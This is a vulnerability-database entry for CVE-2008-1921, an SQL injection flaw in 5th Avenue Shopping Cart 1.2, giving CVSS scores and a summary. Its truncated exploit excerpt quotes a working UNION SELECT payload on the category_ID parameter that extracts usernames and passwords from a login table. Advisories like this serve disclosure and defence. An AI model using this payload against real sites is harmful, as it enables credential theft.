7.5
CVSSv2

CVE-2008-1921

Published: 23/04/2008 Updated: 11/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in store_pages/category_list.php in 5th Avenue Shopping Cart 1.2 trial edition allows remote malicious users to execute arbitrary SQL commands via the category_ID parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

5th avenue software 5th avenue shopping cart 1.2

Exploits

Aria-Security Team (Persian Security Team) Aria-SecurityNet (Persian) Aria-Securitycom (ENG) -------------------------------------------- 5th avenue Shopping Cart SQL Injection Greetz: AurA, Kinglet, NULL category_listphp?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/* no ...